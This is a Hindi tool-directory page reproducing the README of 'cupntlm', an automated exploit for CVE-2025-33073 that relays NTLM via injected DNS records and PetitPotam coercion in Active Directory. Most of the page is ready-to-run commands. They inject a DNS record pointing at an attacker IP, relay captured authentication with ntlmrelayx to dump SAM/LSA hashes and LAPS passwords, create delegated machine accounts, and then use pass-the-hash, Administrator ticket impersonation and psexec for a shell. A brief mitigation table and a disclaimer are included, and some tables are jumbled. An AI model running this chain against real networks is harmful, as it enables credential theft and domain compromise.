Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/egcupcake/cupntlm-automated-exploit-for-cve-2025-33073-
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपार्श्व आंदोलनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
प्रमाणीकरण
रेड टीमिंग
DNS विश्लेषण
GitHubegcupcake/cupntlm-automated-exploit-for-cve-2025-33073-

cupntlm-Automated-Exploit-For-CVE-2025-33073-

cupntlm

रिपॉजिटरी देखें
335 महीने पहलेअभी तक समीक्षित नहीं

cupntlm

CVE-2025-33073 — DNS जबरदस्ती के माध्यम से NTLM प्रतिबिंब बाईपास
सक्रिय निर्देशिका वातावरण के लिए स्वचालित शोषण उपकरण।


अवलोकन

cupntlm NTLM प्रतिबिंब/रिले आक्रमण श्रृंखला को स्वचालित करता है जो CVE-2025-33073 का दुरुपयोग करता है। यह DNS रिकॉर्ड इंजेक्शन, बलपूर्वक प्रमाणीकरण जबरदस्ती (PetitPotam), और NTLM रिले को एक ही वर्कफ़्लो में जोड़ता है। यह उपकरण दो ऑपरेशनल मोड का समर्थन करता है जो दायरे और गुप्तता आवश्यकताओं पर निर्भर करता है।

आक्रमण श्रृंखला सारांश

root@kitploit:~
हमलावर                    डोमेन नियंत्रक              लक्ष्य होस्ट
   │                               │                            │
   │── 1. DNS रिकॉर्ड इंजेक्ट करें ───────▶│                            │
   │      (हमलावर IP लक्ष्य के रूप में)   │                            │
   │                                │                            │
   │── 2. प्रमाणीकरण जबरदस्ती (PetitPotam) ─────────────────────────────▶│
   │                                │                            │
   │◀─ 3. NTLM प्रमाणीकरण वापस भेजा गया ─────────────────────────────│
   │                                │                            │
   │── 4. DC को रिले करें ─────────────▶│                            │
   │      (ntlmrelayx)              │                            │
   │                                │                            │
   │◀─ 5. शेल / secretsdump / आदि.│                            │

लक्ष्य नेटवर्क पर आवश्यक शर्तें:

  • SMB साइनिंग रिले लक्ष्य पर अक्षम हो
  • एक वैध निम्न-विशेषाधिकार डोमेन खाता (केवल-पढ़ने के लिए पर्याप्त है)
  • DC तक नेटवर्क पहुंच (पोर्ट 389 LDAP, 445 SMB)

आवश्यकताएँ

सिस्टम पैकेज

पायथन लाइब्रेरीज़

लाइब्रेरीइंस्टॉल
impacketpip3 install impacket --break-system-packages
coloramapip3 install colorama --break-system-packages
dnspythonpip3 install dnspython --break-system-packages

exploit/ निर्देशिका सामग्री (setup.sh द्वारा स्वतः-जनित)

root@kitploit:~
exploit/
├── cupntlm.py
├── ntlmrelayx.py       # from impacket
├── dnstool.py          # from krbrelayx
├── lib/                # krbrelayx support library
└── PetitPotam.py

स्थापना

root@kitploit:~
git clone https://github.com/EgCupCake/cupntlm.git
cd cupntlm
sudo bash setup.sh

उपयोग

जांच मोड — आक्रमण की व्यवहार्यता सत्यापित करें

कुछ भी प्रयास करने से पहले लक्ष्यों पर SMB साइनिंग स्थिति की जांच करता है और डोमेन क्रेडेंशियल्स को मान्य करता है।

root@kitploit:~
cd exploit
sudo python3 cupntlm.py check \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100

प्रति-लक्ष्य मोड — प्रति होस्ट अलग DNS रिकॉर्ड

प्रत्येक लक्ष्य के लिए एक अद्वितीय DNS रिकॉर्ड बनाता है, एक-एक करके जबरदस्ती ट्रिगर करता है, और पुनरावृत्तियों के बीच रिकॉर्ड साफ करता है। धीमा लेकिन अधिक सटीक और कम शोर छोड़ता है।

root@kitploit:~
sudo python3 cupntlm.py per-target \
  --targets targets.txt \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100 \
  --loot loot.txt

एकल मोड — एक DNS रिकॉर्ड, स्थायी रिले

एक एकल DNS रिकॉर्ड इंजेक्ट करता है और सभी लक्ष्यों के माध्यम से पुनरावृति करते हुए ntlmrelayx को लगातार चलाता है। बड़े दायरे के लिए तेज़।

root@kitploit:~
sudo python3 cupntlm.py single \
  --targets targets.txt \
  --domain lab.local \
  --user pentester \
  --pass 'P@ss' \
  --dc-ip 10.0.0.1 \
  --relay-ip 192.168.1.100 \
  --loot loot.txt

targets.txt प्रारूप

root@kitploit:~
192.168.1.10
192.168.1.11
192.168.1.12

मैन्युअल शोषण

निम्नलिखित चरण cupntlm.py का उपयोग किए बिना पूर्ण आक्रमण श्रृंखला को मैन्युअल रूप से पुन: उत्पन्न करते हैं। प्राइमिटिव को समझने, डीबग करने, या गैर-मानक वातावरण में अनुकूलन के लिए उपयोगी।

चरण 1 — SMB साइनिंग की गणना करें

उन होस्टों की पहचान करें जहां SMB साइनिंग अक्षम है। ये आपके वैध रिले लक्ष्य हैं।

root@kitploit:~
netexec smb 192.168.1.0/24 --gen-relay-list targets_unsigned.txt

या nmap के साथ:

root@kitploit:~
nmap -p 445 --script smb2-security-mode 192.168.1.0/24

देखें:

root@kitploit:~
संदेश साइनिंग सक्षम लेकिन आवश्यक नहीं   ← वैध रिले लक्ष्य
संदेश साइनिंग सक्षम और आवश्यक       ← यहां रिले नहीं कर सकते

चरण 2 — एक दुर्भावनापूर्ण DNS रिकॉर्ड इंजेक्ट करें

डोमेन के DNS में एक A रिकॉर्ड जोड़ने के लिए dnstool.py का उपयोग करें जो एक होस्टनाम को आपकी मशीन पर इंगित करता है। जब कोई लक्ष्य इस होस्टनाम को हल करता है और प्रमाणित करता है, तो अनुरोध आपके रिले श्रोता पर आता है।

root@kitploit:~
cd exploit/

python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action add \
  --record 'attacker-relay' \
  --data 192.168.45.200 \        # your attacker IP
  --type A \
  10.0.0.1                       # DC IP

सत्यापित करें कि रिकॉर्ड जोड़ा गया था:

root@kitploit:~
python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action query \
  --record 'attacker-relay' \
  10.0.0.1

चरण 3 — NTLM रिले श्रोता प्रारंभ करें

जबरदस्ती ट्रिगर करने से पहले ntlmrelayx.py प्रारंभ करें। यह आने वाले प्रमाणीकरण की प्रतीक्षा करेगा।

SMB पर रिले — SAM/LSA डंप करें:

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t smb://192.168.1.100 \
  -smb2support \
  --no-http-server

LDAP पर रिले — एक नया मशीन खाता बनाएं (RBCD / छाया क्रेडेंशियल के लिए):

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t ldap://10.0.0.1 \
  --delegate-access \
  --no-smb-server \
  --no-http-server

LDAPS पर रिले — डोमेन रहस्य डंप करें:

root@kitploit:~
sudo python3 ntlmrelayx.py \
  -t ldaps://10.0.0.1 \
  --dump-laps \
  --no-smb-server \
  --no-http-server

चरण 4 — PetitPotam के साथ प्रमाणीकरण जबरदस्ती करें

लक्ष्य मशीन को आपके इंजेक्ट किए गए DNS रिकॉर्ड में आउटबाउंड प्रमाणीकरण करने के लिए ट्रिगर करें। PetitPotam MS-EFSRPC इंटरफ़ेस का दुरुपयोग करता है — अप्रबंधित होस्ट पर कोई क्रेडेंशियल की आवश्यकता नहीं, या प्रबंधित के लिए वैध क्रेडेंशियल का उपयोग करें।

अप्रमाणित (अपैच लक्ष्य):

root@kitploit:~
python3 PetitPotam.py \
  [dnsname] \         # your listener IP (matches DNS record)
  192.168.1.50             # target host to coerce

प्रमाणित (पैच किया गया लक्ष्य, वैध क्रेडेंशियल आवश्यक):

root@kitploit:~
python3 PetitPotam.py \
  -u pentester \
  -p 'P@ss' \
  -d lab.local \
   [dnsname] \
  192.168.1.50

इस बिंदु पर, जबरदस्ती किया गया होस्ट अपने NTLM प्रमाणीकरण को आपकी मशीन पर भेजता है → ntlmrelayx इसे पकड़ता है और रिले करता है।


चरण 5 — आउटपुट एकत्र करें

चरण 3 में आपके द्वारा चुने गए रिले लक्ष्य के आधार पर:

  • SMB रिले → ntlmrelayx हैश को stdout पर डंप करता है और <hostname>_samhashes.txt / _lsahashes.txt लिखता है
  • LDAP प्रतिनिधि-पहुंच → ntlmrelayx बनाए गए मशीन खाते का नाम और पासवर्ड प्रिंट करता है; सेवा टिकट के लिए getST.py के साथ अनुवर्ती करें
  • LDAPS डंप → LAPS पासवर्ड सीधे मुद्रित होते हैं

चरण 6 — DNS रिकॉर्ड साफ करें

सगाई के बाद हमेशा इंजेक्ट किए गए DNS रिकॉर्ड हटाएं।

root@kitploit:~
python3 dnstool.py \
  -u "lab.local\\pentester" \
  -p 'P@ss' \
  --action remove \
  --record 'attacker-relay' \
  --data 192.168.45.200 \
  --type A \
  10.0.0.1

शोषण-पश्चात उदाहरण

रिले किए गए मशीन खाते के साथ पास-द-हैश:

root@kitploit:~
impacket-secretsdump \
  'lab.local/MACHINE$'@10.0.0.1 \
  -hashes :aad3b435b51404eeaad3b435b51404ee:<NT_HASH>

S4U2Self के लिए सेवा टिकट प्राप्त करें (RBCD के बाद):

root@kitploit:~
impacket-getST \
  -spn cifs/TARGET.lab.local \
  -impersonate Administrator \
  'lab.local/ATTACKERMACHINE$:password'

टिकट का उपयोग करें:

root@kitploit:~
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass TARGET.lab.local

शमन

नियंत्रणप्रभाव
सभी होस्टों पर SMB साइनिंग (आवश्यक) सक्षम करें

अस्वीकरण

यह उपकरण केवल अधिकृत प्रवेश परीक्षण और सुरक्षा अनुसंधान के लिए है।
उन प्रणालियों के विरुद्ध उपयोग न करें जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।


श्रेय

  • fortra/impacket — ntlmrelayx
  • dirkjanm/krbrelayx — dnstool
  • topotam/PetitPotam — EFS coercion
टूल डाउनलोड करें
उपकरणउद्देश्य
python3रनटाइम
pip3पायथन पैकेज प्रबंधक
gitनिर्भरताएँ क्लोन करना
wgetफ़ाइलें डाउनलोड करना
nmapSMB साइनिंग गणना
netexec / crackmapexecSMB साइनिंग जांच (वैकल्पिक)
SMB पर रिले तोड़ता है
LDAP साइनिंग + चैनल बाइंडिंग सक्षम करेंLDAP/LDAPS पर रिले तोड़ता है
MS-EFSRPC को पैच करें (KB5005413)अप्रमाणित PetitPotam को अवरुद्ध करता है
DNS रिकॉर्ड निर्माण को प्रशासकों तक सीमित करेंDNS इंजेक्शन चरण को अवरुद्ध करता है
NTLM नेटवर्क प्रमाणीकरण अक्षम करें (Kerberos पसंद करें)पूरी कक्षा को समाप्त करता है